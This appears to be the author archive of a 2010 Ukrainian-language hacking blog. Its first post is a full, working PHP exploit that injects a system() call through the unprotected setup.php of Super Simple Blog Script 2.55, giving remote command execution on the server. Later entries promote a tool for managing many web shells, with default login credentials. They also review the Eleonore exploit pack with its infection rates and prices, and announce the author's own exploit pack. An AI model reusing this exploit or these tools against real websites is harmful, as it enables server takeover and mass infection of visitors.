Archive

Author Archive

Super Simple Blog Script Remote Command Execution Exploit

August 4th, 2010 Dimi4 No comments

Вразливість в даному продукті виникає через недостатню фільтрацію даних. Система після встановлення не попереджає користувача про необхідність видалення файлу setup.php, внаслідок неавторизованого доступу до цього файлу атакуючий має можливість виконати будь-яку команду в системі з правами веб-сервера. Нижче приведений код експлойту.

<?php

/**
 * @author Paketik [UASC.org.ua]
 * @copyright 2010
 * @Super Simple Blog Script Remote Command Execution Exploit
 * @Version 2.55
 * @Vendor www.supersimple.org
 * @Risk Very high
 * @usage exp.php domen path command
 * @example php exp.php http://localhost/SuperSimpleBlogScript ls -la
 */

error_reporting(false);

if(count($argv) < 3) { banner(); } else
{
 echo count($argv) ;
 $command = "";
 for($i=2; $i<count($argv); $i++)
 {
 $command .= $argv[$i] . " ";
 }
 $command = trim($command);
 exploit($argv[1],$command);
 }
function exploit($target,$command)
{
 $rnd = randomtab();
 print "[#] Target: ".$target."\r\n";
 print "[#] Command: ". $command."\r\n";
 print "[#] Generating random table name: ". $rnd."\r\n";
 print "[#] Parsing Full Path ";
 $content = file_get_contents($target."/setup.php");
 $p = getpath($content);
 print $p."\r\n";
 print "[#] Exploiting....\r\n";

 $_data = array("BASEURL" => $p,
 "PAGETITLE"=>"Title",
 "PERPAGE"=>20,
 "BLOGPAGENAME"=>"index",
 "USER0"=>"qaz",
 "PASSWORD0"=>"qaz",
 "IMAGESPERENTRY"=>1,
 "MULTIUSERS"=>"false",
 "COMMENT"=>"true",
 "TABLENAME"=>$rnd,
 "TIMEOFFSET"=>0,
 "RSSDESC"=>"rss'; system('".$command."'); //",
 "url"=>$target,
 "submit"=>"");
 $data = array();
 list($header, $content) = PostRequest($target."/setup.php", $target."setup.php", $_data);
 //print $header;
 if( strpos($header,"success"))
 {
 print "[###] Successful! View result:$target \r\n";
 } else
 {
 print "[---] Exploit Failed :(  \r\n";
 die();
 }

}

function randomtab()
{
 $a = array("a","b","c","d","e","f","g",1,2,3,4,5,6,7,8,9,0);
 $string = $a[rand(0,16)].$a[rand(0,16)].$a[rand(0,16)].$a[rand(0,16)].$a[rand(0,16)];
 return $string;
}
function PostRequest($url, $referer, $_data) {

 $data = array();
 while(list($n,$v) = each($_data)){
 $data[] = "$n=$v";
 }
 $data = implode('&', $data);

 $url = parse_url($url);
 if ($url['scheme'] != 'http') {
 die('Only HTTP request are supported !');
 }

 $host = $url['host'];
 $path = $url['path'];

 $fp = fsockopen($host, 80);

 fputs($fp, "POST $path HTTP/1.1\r\n");
 fputs($fp, "Host: $host\r\n");
 fputs($fp, "Referer: $referer\r\n");
 fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
 fputs($fp, "Content-length: ". strlen($data) ."\r\n");
 fputs($fp, "Connection: close\r\n\r\n");
 fputs($fp, $data);

 $result = '';
 while(!feof($fp)) {

 $result .= fgets($fp, 128);
 }

 fclose($fp);

 $result = explode("\r\n\r\n", $result, 2);

 $header = isset($result[0]) ? $result[0] : '';
 $content = isset($result[1]) ? $result[1] : '';

 return array($header, $content);
}
function getpath($content)
{
 $a =  preg_match('/BASEURL" value="(.+?)"/i',$content,$m);
 return $m[1];
}

function banner()
{
 print "/**\r\n
 * @author Paketik [UASC.org.ua]\r\n
 * @copyright 2010\r\n
 * @Super Simple Blog Script Remote Command Execution Exploit \r\n
 * @Version 2.55 \r\n
 * @Vendor www.supersimple.org \r\n
 * @Risk Very high\r\n
 * @usage exp.php domen path command\r\n
 * @example php exp.php http://localhost/SuperSimpleBlogScript ls -la  \r\n
 */";
 die();
}
?>

Truecrypt, VBS, Acer – автоматизуємо монтування прихованих образів

July 27th, 2010 Dimi4 2 comments

Давно нічого тут не писалось, тому вирішив трохи освіжити блог, та й нагадати начим читачам що ми існуєм). Отож почнем..

Прикупив собі новий ноутбук –  Acer Aspire 5738z. Повинен сказати – просто краса, ноутбук і справді непоганий. У зв’язку з збільшенням квоти на харддиску вирішив завести собі окремий прихований розділ, закриптований trucrypt. Все пройшло чудово, розділ захищений файлом ключів, що замасковані під mp3 файл. Та запускати зажди трукрипт, вибирати розділ, ключі, монтувати мене не приваблювало. Але ця проблема досить легко вирішилась. Як? Читаєм підкатом..

Read more…

madShellC0ntr01 – система для роботи з шеллами

April 11th, 2010 Dimi4 No comments

madShellC0ntr01 v1.2

Писався софт достатньо давно, та і виключно в цілях ознайомлення ;) Якщо чесно, то я вже навіть не пам’ятаю чи реалізував все що хотів, чи ні (хоча скоріше, що ні). Отже, дозвольте представити вам систему для роботи з великою кількістю веб-шеллів типу madshell.

Меню:

  • Shell List
  • Stats
  • Add shells
  • Command Execution
  • Logs


Думаю все інтуїтивно зрозуміло (:

В версії 1.2 система автоматично оприділяє такі параметри:

  • Safe Mode
  • Platform
  • Version
  • Country

Стандартна пара логін-пароль: admin:pass

Завантажити

Тест зв’язки експлойтів Eleonore exploits pack

March 30th, 2010 Dimi4 5 comments

Хочу надати вам інформацію про тестування зв’язки експлойтів  Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв’язки входять такі експлойти

  • MDAC
  • MS009-02
  • Telnet – Opera
  • Font tags – FireFox
  • PDF collab.getIcon
  • PDF Util.Printf
  • PDF collab.collectEmailInfo
  • DirectX DirectShow
  • Spreadsheet

Середній пробив характерний для звязки:

  • usa: 5-15%
  • mix: 10-25%

Ціни:

  • Власне зв’язка = 700$
  • Чищення від АВ = 50$
  • Ребілд на інший домен = 50$

Як не дивно, та в системі присутні вразливості, далі про них.

Read more…

Пожежа в дата-центрі хостингу HOSTING.UA

March 28th, 2010 Dimi4 2 comments

Увечері в суботу 27 березня, близько 21:00 за київським часом на другому поверсі бізнес-центру “Фабрика Бізнесу” за адресою м. Одеса вул. Дальницька, 46, де знаходиться датацентр одного з найбільших на Україні хостинг-провайдерів HOSTING.UA почалася пожежа.

Встановлена в датацентрі система пожежогасіння з нез’ясованих причин не спрацювала. Сигнал від датчиків надійшов на пульт системи пожежогасіння, проте  обладнання не спрацювало. З цієї причини замість належних для датацентрів безводних систем пожежогасіння на основі порошкових або газових сумішах, прибули пожежники використовували наявні в їхньому розпорядженні засоби, що збільшило збиток нанесений серверам у датацентрі. Вікна в датацентрі вибиті в ході заходів з пожежогасіння.

Серверам у ДЦ завдано великої шкоди. Співробітники датацентру не можуть у даний час оцінити його обсяг, хоча стверджують, що частина серверів вціліла. Наскільки це правда – не відомо. Є інформація, що навіть оцінка збитку зможе бути завершена не раніше ніж через тиждень. На поточний момент, вже більше 12 годин, клієнтам хостинг-провайдера до цих пір не надходить жодної офіційної інформації, що підтверджує припущення про значні масштаби збитку.

Фотографія з місця подій:

Виводим сайт в топ на UA TOP Bloggers або взлом top.blog.net.ua

March 26th, 2010 Dimi4 2 comments

Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи.

Що треба щоб бути в топі?

UA TOP Bloggers визначає позиції сайту за такими показниками:

  • Кількість хостів (унікальні користувачі)
  • Кількіст хітів (кількість переглядів)

Розглянемо як система реєструє ці дані. Від нас вимагають встановити код кнопки на сайті. Логічно що через нього і проводиться підрахунок. Поглянемо на код:

Все зрозуміло –  картинка генерується скриптом, якому передаються 2 параметри: in,id. Id це і є номер нашого сайту.

Read more…

0-day експлойт для Internet Explorer

March 12th, 2010 Dimi4 5 comments

Експлойт був знайдений на сайті www.topix21century.com. Начинка експлойта завантажувала та виконувала на комп’ютері жертви бінарний файл, який в свою чергу встановлював зєднання з www.topix21century.com.
Наразі вже є готовий експлойт написаний для Metasploit Framework. Успішно спрацював на вказаних продуктах:
– Microsoft Internet Explorer 7, Windows Vista SP2
– Microsoft Internet Explorer 7, Windows XP SP3
– Microsoft Internet Explorer 6, Windows XP SP3

Подивитись вихідний код експлойту.

Експлойт запропонований Moshe Ben Abu (деобфускований та з видаленою malware начинкою):
У звязку з тим, що ESET NOD32 через код сплойту сповіщає що наш блог містить потенційно небезпечний контент – даємо лінк на код експлойту:

http://uasc.org.ua/files/ie6-7exploit.txt

Відео роботи експлойта:

Internet Explorer 0-day Attack from Panda Security on Vimeo.

Взлом Міністерства Освіти і Науки України – стаття в хакері

March 1st, 2010 Dimi4 9 comments

В журналі “][акер" #134 2010 р. вийшла моя стаття "GOV сайты под угрозой". Далі оригінал статті на російській мові.

GOV сайты под угрозой

GOV сайты под угрозой

Read more…

SALO PACK – Зв’язка сплойтів (exploit pack)

February 19th, 2010 Dimi4 10 comments

SALO PACK © UASC

by n0153r, Dimi4

  • Даний програмний продукт призначений тільки для освітніх цілей. Використання його в будь-якому іншому
  • вигляді може бути розцінено як порушення закону!
  • Заборонено продаж і використання вихідного коду SALO PACK в комерційних цілях

Read more…

Система виявлення вторгнень AntiBdoor

February 6th, 2010 Dimi4 4 comments

AntiBdoor є безкоштовною, вузловою СВВ, з відкритим вихідним кодом (Host-based IDS, HIDS). Вона забезпечує аналіз цілісності файлів, виявлення потенційно небезпечних програм, активні заходи у відповідь на загрозу.

Для розробки системи використано технології PHP, SQL, XHTML, CSS, AJAX. Read more…